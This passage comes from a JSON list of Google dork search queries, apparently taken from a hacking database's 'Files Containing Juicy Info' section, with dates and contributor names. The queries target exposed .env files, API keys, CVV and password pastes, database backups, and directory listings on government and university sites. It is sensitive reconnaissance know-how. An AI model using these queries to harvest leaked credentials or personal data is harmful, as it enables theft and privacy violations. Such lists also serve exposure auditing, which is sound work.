intitle:\"index of\" \"shtml.dll \"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "inurl:admin ext:sql", "description": "# Google Dork: inurl:admin ext:sql\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of:\"password\" \"wp-content\"", "description": "# Google Dork: index of:\"password\" \"wp-content\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"putty\" \"uploads\"", "description": "# Google Dork: index of: \"putty\" \"uploads\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"participants\" \"uploads\"", "description": "# Google Dork: index of: \"participants\" \"uploads\"\r\n# Files Containing Juicy Info\r\n# Date: 11/05/2021 \r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "filetype:txt site:gitlab.* \"secret\" OR \"authtoken\"", "description": "# Google Dork: filetype:txt site:gitlab.* \"secret\" OR \"authtoken\"\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Jorge Manuel Lozano G\u00f3mez"}, {"dork": "site:gitlab.* intext:password intext:@gmail.com | @yahoo.com | @hotmail.com", "description": "# Google Dork: site:gitlab.* intext:password intext:@gmail.com | @yahoo.com | @hotmail.com\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Jorge Manuel Lozano G\u00f3mez"}, {"dork": "inurl: */.env", "description": "# Google Dork: inurl: */.env\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Vivek Pancholi"}, {"dork": "intitle:\"index of\" \"/.git/config\"", "description": "# Google Dork: intitle:\"index of\" \"/.git/config\"\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Vivek Pancholi"}, {"dork": "intitle:\"index of\" \"*/ftp.txt\"", "description": "# Google Dork: intitle:\"index of\" \"*/ftp.txt\"\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Vivek Pancholi"}, {"dork": "intext:\"index of\" \"user-config\"", "description": "# Google Dork: intext:\"index of\" \"user-config\"\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "intitle:\"database\" \"backup\" filetype:sql", "description": "# Google Dork: intitle:\"database\" \"backup\" filetype:sql\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "intext:\"sitemap\" filetype:txt", "description": "# Google Dork: intext:\"sitemap\" filetype:txt\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "intext:pass filetype:txt", "description": "# Google Dork: intext:pass filetype:txt\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "inurl:/package.json", "description": "# Google Dork: inurl:/package.json\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Jaydev Ahire"}, {"dork": "intitle\"index of\" \"username\" \"password\" filetype: xlsx", "description": "# Google Dork: intitle\"index of\" \"username\" \"password\" filetype: xlsx\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "intitle:\"Index of /logs/\" \"nginx\"", "description": "# Google Dork: intitle:\"Index of /logs/\" \"nginx\"\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: jyotiprakash Rabha"}, {"dork": "intext:\"index of\" \"home_page\"", "description": "# Google Dork: intext:\"index of\" \"home_page\"\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "inurl:/mutillidae/ \"Toggle Hints\"", "description": "# Google Dork: inurl:/mutillidae/ \"Toggle Hints\"\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Kin Wong"}, {"dork": "intext:\"index of\" inurl:/etc/", "description": "# Google Dork: intext:\"index of\" inurl:/etc/\r\n# Files Containing Juicy Info\r\n# Date:7/11/2021\r\n# Exploit Author: Sandesh Ajgekar"}, {"dork": "inurl:wp-content/uploads/wooccm_uploads", "description": "# Google Dork: inurl:wp-content/uploads/wooccm_uploads\r\n# Files Containing Juicy Info\r\n# Date:7/11/2021\r\n# Exploit Author: Stuart Steenberg"}, {"dork": "intitle:\"index of\" \"particle.js\"", "description": "# Google Dork: intitle:\"index of\" \"particle.js\"\r\n# Files Containing Juicy Info\r\n# Date:7/11/2021\r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "index of: \"invoice\" \"upload\"", "description": "# Google Dork: index of: \"invoice\" \"upload\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Raghavaraju Lohitha"}, {"dork": "intitle:\"index of\" Hindi movies", "description": "# Google Dork: intitle:\"index of\" Hindi movies\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intext:\"index of\" \"wp-uploads\"", "description": "# Google Dork: intext:\"index of\" \"wp-uploads\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intext:\"index of\" \"signin\"", "description": "# Google Dork: intext:\"index of\" \"signin\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "index of: \"marksheet\" \"upload\"", "description": "# Google Dork: index of: \"marksheet\" \"upload\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "inurl:gov.uk", "description": "# Google Dork: inurl:gov.uk\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intext:\"Index of\" intext:\"users.zip\"", "description": "# Google Dork: intext:\"Index of\" intext:\"users.zip\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Parshwa Bhavsar"}, {"dork": "intext:\"Index of\" \"services.php | pass.php | passwd.php | credentials.txt\"", "description": "# Google Dork: intext:\"Index of\" \"services.php | pass.php | passwd.php | credentials.txt\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Parshwa Bhavsar"}, {"dork": "intitle:\"index of\" \"dhcp\"", "description": "# Google Dork: intitle:\"index of\" \"dhcp\"\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of:\"blog\" \"upload\"", "description": "# Google Dork: index of:\"blog\" \"upload\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "inurl:cache/uploads", "description": "# Google Dork: inurl:cache/uploads\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "intitle:\"index of\" \"Apache/2.4.41 (Ubuntu) Server\"", "description": "# Google Dork: intitle:\"index of\" \"Apache/2.4.41 (Ubuntu) Server\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Chinmay Divekar"}, {"dork": "{intitle: indexof/.git }", "description": "# Google Dork: {intitle: indexof/.git }\r\n# Files Containing Juicy Info\r\n# Date: 9/11/2021 \r\n# Exploit Author: Aadesh deep namdev"}, {"dork": "site:gov.hk intitle:index of /", "description": "# Google Dork: site:gov.hk intitle:index of /\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Nithissh S"}, {"dork": "inurl:pastebin \"AWS_ACCESS_KEY\"", "description": "# Google Dork: inurl:pastebin \"AWS_ACCESS_KEY\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Nithissh S"}, {"dork": "site:*/forgotpassword.php", "description": "# Google Dork: site:*/forgotpassword.php\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "site:.edu intitle:\"index of\"", "description": "# Google Dork: site:.edu intitle:\"index of\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "site:pastebin.com \"*@gmail.com password\"", "description": "# Google Dork: site:pastebin.com \"*@gmail.com password\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "site:.edu inurl:search", "description": "# Google Dork: site:.edu inurl:search\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "intitle:\"Index of\" \"DCIM/camera\"", "description": "# Google Dork: intitle:\"Index of\" \"DCIM/camera\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"Index of\" \"Screenshot\"", "description": "# Google Dork: intitle:\"Index of\" \"Screenshot\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"Index of\" \"system32\"", "description": "# Google Dork: intitle:\"Index of\" \"system32\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"Index of\" \"Program files\"", "description": "# Google Dork: intitle:\"Index of\" \"Program files\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"Index of\" *.py", "description": "# Google Dork: intitle:\"Index of\" *.py\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of\" \"certificates\"", "description": "# Google Dork: intitle:\"index of\" \"certificates\"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Chinmay Divekar"}, {"dork": "intitle:\"index of\" \"/.cpanel\"", "description": "# Google Dork: intitle:\"index of\" \"/.cpanel\"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: chinmay Divekar"}, {"dork": "\"index of\" :excel documents", "description": "# Google Dork: \"index of\" :excel documents\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Renuka Kharat"}, {"dork": "intitle:\"index of\" :mobile number", "description": "# Google Dork: intitle:\"index of\" :mobile number\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Renuka Kharat"}, {"dork": "intitle:\"index of\" \"node.js\"", "description": "# Google Dork: intitle:\"index of\" \"node.js\"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "intext:\"Index of\" intext:\"config.zip\"", "description": "# Google Dork: intext:\"Index of\" intext:\"config.zip\"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Parth Surati"}, {"dork": "inurl: conf/fastcgi.conf", "description": "# Google Dork: inurl: conf/fastcgi.conf\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Nithissh S"}, {"dork": "inurl:conf/nginx.conf", "description": "# Google Dork: inurl:conf/nginx.conf\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Nithissh S"}, {"dork": "site:com intitle:\"index of\" .env", "description": "# Google Dork: site:com intitle:\"index of\" .env\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Suvendu Dash"}, {"dork": "intitle:\"Index of\" *.xlsx", "description": "# Google Dork: intitle:\"Index of\" *.xlsx\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "inurl:pastebin \"SHODAN_API_KEY\"", "description": "# Google Dork:inurl:pastebin \"SHODAN_API_KEY\"\r\n# Files Containing Juicy Info\r\n# Date: 09/11/2021 \r\n# Exploit Author: Nithissh S"}, {"dork": "inurl:*gov intitle:\"index of/documents\"", "description": "# Google Dork: inurl:*gov intitle:\"index of/documents\"\r\n# Files Containing Juicy Info\r\n# Date: 09/11/2021 \r\n# Exploit Author: Resham Kumar Chaudhary"}, {"dork": "inurl:.php?=*php site:.nic.in", "description": "# Google Dork: inurl:.php?=*php site:.nic.in\r\n# Files Containing Juicy Info\r\n# Date: 09/11/2021\r\n# Exploit Author: Sagar Jana"}, {"dork": "intitle:\"index of\" \"/students\"", "description": "# Google Dork: intitle:\"index of\" \"/students\"\r\n# Files Containing Juicy Info\r\n# Date: 09/11/2021 \r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "site:com \"rfp\" filetype:pdf", "description": "# Google Dork: site:com \"rfp\" filetype:pdf\r\n# Files Containing Juicy Info\r\n# Date: 10/11/2021 \r\n# Exploit Author: Satish Kumar Singh"}, {"dork": "site:.edu intext:\"index of\" \"logs\"", "description": "# Google Dork: site:.edu intext:\"index of\" \"logs\"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "intext:\"Index of /chatlogs\"", "description": "# Google Dork: intext:\"Index of /chatlogs\"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Kashish rohilla"}, {"dork": "inurl:pastebin \"CVV\"", "description": "# Google Dork: inurl:pastebin \"CVV\"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Ritika Keni"}, {"dork": "site: com intext \" organisation data\" filetype:xls", "description": "# Google Dork: site: com intext \" organisation data\" filetype:xls\r\n# Files Containing Juicy Info\r\n# Date: 10/11/2021 \r\n# Exploit Author: Sonali Bhutad"}, {"dork": "intitle:\"index of\" \"default.asp \"", "description": "# Google Dork: intitle:\"index of\" \"default.asp \"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" fileadmin \"", "description": "# Google Dork: intitle:\"index of\" \" fileadmin \"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" YaBB.pl \"", "description": "# Google Dork: intitle:\"index of\" \" YaBB.pl \"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" htsearch \"", "description": "# Google Dork: intitle:\"index of\" \" htsearch \"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" glimpse \"", "description": "# Google Dork: intitle:\"index of\" \" glimpse \"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" webdriver \"", "description": "# Google Dork: intitle:\"index of\" \" webdriver \"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" index.php.bak \"", "description": "# Google Dork: intitle:\"index of\" \" index.php.bak \"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" sendmail.inc \"", "description": "# Google Dork: intitle:\"index of\" \" sendmail.inc \"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" login.jsp \"", "description": "# Google Dork: intitle:\"index of\" \" login.jsp \"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" mod_auth_mysql \"", "description": "# Google Dork: intitle:\"index of\" \" mod_auth_mysql \"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"test.bat \"", "description": "# Google Dork: intitle:\"index of\" \"test.bat \"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"msadcs.dll \"", "description": "# Google Dork: intitle:\"index of\" \"msadcs.dll \"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"browser.inc \"", "description": "# Google Dork: intitle:\"index of\" \"browser.inc \"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"hello.bat \"", "description": "# Google Dork: intitle:\"index of\" \"hello.bat \"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"dvwssr.dll \"", "description": "# Google Dork: intitle:\"index of\" \"dvwssr.dll \"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" Servlet\"", "description": "# Google Dork: intitle:\"index of\" Servlet\"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" upload.asp \"", "description": "# Google Dork: intitle:\"index of\" upload.asp \"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "inurl:pastebin \"API_KEY\"", "description": "# Google Dork: inurl:pastebin \"API_KEY\"\r\n# Files Containing Juicy Info\r\n# Date:10/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "inurl:pastebin \"Windows 10 Product Keys*\"", "description": "# Google Dork: inurl:pastebin \"Windows 10 Product Keys*\"\r\n# Files Containing Juicy Info\r\n# Date:10/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of\" \"data*\"", "description": "# Google Dork: intitle:\"index of\" \"data*\"\r\n# Files Containing Juicy Info\r\n# Date:10/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of\" \"document*.pdf\"", "description": "# Google Dork: intitle:\"index of\" \"document*.pdf\"\r\n# Files Containing Juicy Info\r\n# Date:10/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "inurl:linkedin.com \"view my resume\" facebook", "description": "# Google Dork: inurl:linkedin.com \"view my resume\" facebook\r\n# Files Containing Juicy Info\r\n# Date: 10/11/2021 \r\n# Exploit Author: Smita Dhanokar"}, {"dork": "intitle.index of .log", "description": "# Google Dork: intitle.index of .log\r\n# Files Containing Juicy Info\r\n# Date: 10/11/2021\r\n# Exploit Author: Arzan Batliwala"}, {"dork": "intitle:\"index of\" \"sysinfo\"", "description": "# Google Dork:intitle:\"index of\" \"sysinfo\"\r\n# Files Containing Juicy Info\r\n# Date: 11/11/2021\r\n# Exploit Author: Hognaglo komi Sergio"}, {"dork": "intitle.index of .exe", "description": "# Google Dork: intitle.index of .exe\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle.index of API*.txt", "description": "# Google Dork: intitle.index of API*.txt\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of\" site:gov.np", "description": "# Google Dork: intitle:\u201cindex of\u201d site:gov.np\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of\" \"*.mp4\"", "description": "# Google Dork: intitle:\"index of\" \"*.mp4\"\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of\" \"admin*.txt\"", "description": "# Google Dork: intitle:\"index of\" \"admin*.txt\"\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "site:.nic.in inurl:.php?id=", "description": "# Google Dork: site:.nic.in inurl:.php?id=\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "inurl:.org intitle index.of \"inflation\"", "description": "# Google Dork: inurl:.org intitle index.of \"inflation\"\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Hardik Jain"}, {"dork": "site:*/admin-portal/", "description": "# Google Dork: site:*/admin-portal/\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Hognaglo komi Sergio"}, {"dork": "intitle:\"index of\" site:gov.ru", "description": "# Google Dork: intitle:\"index of\" site:gov.ru\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of\" site:gov.gr", "description": "# Google Dork: intitle:\"index of\" site:gov.gr\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "site:.in | .com | .net intitle:\"index of\" ftp", "description": "# Google Dork: site:.in | .com | .net intitle:\"index of\" ftp\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "inurl:forgotpassword.php", "description": "# Google Dork: inurl:forgotpassword.php\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of\" site:gov.*", "description": "# Google Dork: intitle:\"index of\" site:gov.*\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: reza abasi"}, {"dork": "intitle:\"index of\" \"/public_html\"", "description": "# Google Dork: intitle:\"index of\" \"/public_html\"\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "inurl:node_modules/ua-parser-js", "description": "# Google Dork: inurl:node_modules/ua-parser-js\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Javier Bernardo"}, {"dork": "intitle:\"index of\" \"/public/js\"", "description": "# Google Dork: intitle:\"index of\" \"/public/js\"\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "site:drive.google.com \"*.pdf\"", "description": "# Google Dork: site:drive.google.com \"*.pdf\"\r\n# Files Containing Juicy Info\r\n# Date:12/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of \"/key/\" \"key.txt\"", "description": "# Google Dork: intitle:\"index of \"/key/\" \"key.txt\"\r\n# Files Containing Juicy Info\r\n# Date:12/11/2021\r\n# Exploit Author: Reza Abasi"}, {"dork": "intitle:\"index of\" \"/products\"", "description": "# Google Dork: intitle:\"index of\" \"/products\"\r\n# Files Containing Juicy Info\r\n# Date: 12/11/2021 \r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "intitle:\"index of\" \"/mysql\"", "description": "# Google Dork: intitle:\"index of\" \"/mysql\"\r\n# Files Containing Juicy Info\r\n# Date:12/11/2021\r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "site:*.ng intitle:index of", "description": "# Google Dork: site:*.ng intitle:index of\r\n# Files Containing Juicy Info\r\n# Date:13/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "site:*.edu.in intitle:index of", "description": "# Google Dork: site:*.edu.in intitle:index of\r\n# Files Containing Juicy Info\r\n# Date:13/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "inurl:*gov intitle:\"index of\" \"docker-compose\"", "description": "# Google Dork: inurl:*gov intitle:\"index of\" \"docker-compose\"\r\n# Files Containing Juicy Info\r\n# Date:13/11/2021\r\n# Exploit Author: Vrushabh Kadam"}, {"dork": "inurl:pastebin \"SHODAN_API_KEY\"", "description": "# Google Dork: inurl:pastebin \"SHODAN_API_KEY\"\r\n# Files Containing Juicy Info\r\n# Date:13/11/2021\r\n# Exploit Author: Vrushabh Kadam"}, {"dork": "inurl:*gov intitle:\"index of/documents\"", "description": "# Google Dork: inurl:*gov intitle:\"index of/documents\"\r\n# Files Containing Juicy Info\r\n# Date:13/11/2021\r\n# Exploit Author: Vrushabh Kadam"}, {"dork": "intitle\"index of\" \"php\"", "description": "# Google Dork: intitle\"index of\" \"php\"\r\n# Files Containing Juicy Info\r\n# Date:14/11/2021\r\n# Exploit Author: Sabyasachi Paul"}, {"dork": "intitle:\"index of\" site:gov.in", "description": "# Google Dork: intitle:\"index of\" site:gov.in\r\n# Files Containing Juicy Info\r\n# Date:14/11/2021\r\n# Exploit Author: Arindam Saha"}, {"dork": "site:*.github.io intext:cheatsheet+offensive+pentesting", "description": "# Google Dork: site:*.github.io intext:cheatsheet+offensive+pentesting\r\n# Files Containing Juicy Info\r\n# Date:14/11/2021\r\n# Exploit Author: Dharmendra Yadav"}, {"dork": "intitle:\"index of\" \"admin.js\"", "description": "# Google Dork: intitle:\"index of\" \"admin.js\"\r\n# Files Containing Juicy Info\r\n# Date:14/11/2021\r\n# Exploit Author: Sabyasachi Paul"}, {"dork": "inurl:gov.in & inurl:admin", "description": "# Google Dork: inurl:gov.in & inurl:admin\r\n# Files Containing Juicy Info\r\n# Date:15/11/2021\r\n# Exploit Author: Amit Adhikari"}, {"dork": "intitle:\"index of\" \"wp-inc\"", "description": "# Google Dork: intitle:\"index of\" \"wp-inc\"\r\n# Files Containing Juicy Info\r\n# Date:15/11/2021\r\n# Exploit Author: Chirag Prajapati"}, {"dork": "allintext\"account number\"", "description": "# Google Dork: allintext\"account number\"\r\n# Files Containing Juicy Info\r\n# Date:15/11/2021\r\n# Exploit Author: Smita Dhanokar"}, {"dork": "site:.edu intext:\"index of\" \"payroll\"", "description": "# Google Dork: site:.edu intext:\"index of\" \"payroll\"\r\n# Files Containing Juicy Info\r\n# Date:15/11/2021\r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "intitle:\"index of\" \"*.yaml\"", "description": "# Google Dork: intitle:\"index of\" \"*.yaml\"\r\n# Files Containing Juicy Info\r\n# Date:15/11/2021\r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "site:*.se intitle:\"index of\"", "description": "# Google Dork: site:*.se intitle:\"index of\"\r\n# Files Containing Juicy Info\r\n# Date:15/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "site:*.id intitle:\"index of\" \"screenshot*.jpg\"", "description": "# Google Dork: site:*.id intitle:\"index of\" \"screenshot*.jpg\"\r\n# Files Containing Juicy Info\r\n# Date:15/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of\" \"*.vcf\"", "description": "# Google Dork: intitle:\"index of\" \"*.vcf\"\r\n# Files Containing Juicy Info\r\n# Date:15/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of\" \"apache.log\" | \"apache.logs\"", "description": "# Google Dork: intitle:\"index of\" \"apache.log\" | \"apache.logs\"\r\n# Files Containing Juicy Info\r\n# Date:15/11/2021\r\n# Exploit Author: Pauras Patil"}, {"dork": "inurl:admin filetype:txt", "description": "# Google Dork: inurl:admin filetype:txt\r\n# Files Containing Juicy Info\r\n# Date: 16/11/2021 \r\n# Exploit Author: Saumyajeet Das"}, {"dork": "inurl:admin filetype:xls site:gov.in", "description": "# Google Dork: inurl:admin filetype:xls site:gov.in\r\n# Files Containing Juicy Info\r\n# Date: 17/11/2021 \r\n# Exploit Author: Saumyajeet Das"}, {"dork": "site:pastebin.com intitle:\"cpanel\"", "description": "# Google Dork: intitle:\"R WebServer\"\r\n# Files Containing Juicy Info\r\n# Date: 17/11/2021 \r\n# Exploit Author: Ishani Dhar"}, {"dork": "intitle:index of settings.py", "description": "# Google Dork: intitle:index of settings.py\r\n# Pages Containing Login Portals\r\n# Date: 18/11/2021 \r\n# Exploit Author: Amit Adhikari"}, {"dork": "site:postman.com + keyword", "description": "# Google Dork: site:postman.com + keyword\r\n# Description: This dork returns public postman API collections\r\n# Files Containing Juicy Info\r\n# Date: 17/11/2021 \r\n# Exploit Author: Gabriel Tarsia"}, {"dork": "inurl:admin filetype:xlsx site:gov.*", "description": "# Google Dork: inurl:admin filetype:xlsx site:gov.*\r\n# Files Containing Juicy Info\r\n# Date: 17/11/2021 \r\n# Exploit Author: Krishna Agarwal"}, {"dork": "db_password filetype:env", "description": "# Google Dork: db_password filetype:env\r\n# Files Containing Juicy Info\r\n# Date:18/11/2021\r\n# Exploit Author: Thiru kumaran"}, {"dork": "inurl: /wp-content/uploads/ inurl:\"robots.txt\" \"Disallow:\" filetype:txt", "description": "# Google Dork: inurl: /wp-content/uploads/ inurl:\"robots.txt\" \"Disallow:\" filetype:txt\r\n# Files Containing Juicy Info\r\n# Date:18/11/2021\r\n# Exploit Author: Ritwick Dadhich"}, {"dork": "inurl:admin filetype:xls", "description": "# Google Dork: inurl:admin filetype:xls\r\n# Files Containing Juicy Info\r\n# Date:18/11/2021\r\n# Exploit Author: Ritwick Dadhich"}, {"dork": "site:gov.* intitle:\"index of\" *.apk", "description": "# Google Dork: site:gov.* intitle:\"index of\" *.apk\r\n# Files Containing Juicy Info\r\n# Date:17/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "site:gov.* intitle:\"index of\" *.csv", "description": "# Google Dork: site:gov.* intitle:\"index of\" *.csv\r\n# Files Containing Juicy Info\r\n# 